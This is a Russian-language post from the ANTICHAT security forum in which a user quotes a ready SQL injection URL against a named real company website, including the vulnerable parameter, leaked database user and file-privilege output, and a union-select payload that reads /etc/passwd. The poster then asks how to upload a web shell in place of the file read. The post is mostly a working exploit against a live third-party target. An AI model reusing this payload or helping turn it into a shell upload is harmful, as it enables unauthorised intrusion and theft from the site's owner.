HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 02.10.2017, 10:47
paponi
Guest
Сообщений: n/a
Провел на форуме:
1526

Репутация: 0
По умолчанию

Цитата:
Сообщение от Печа  
Печа said:

Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
Код:
Code:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ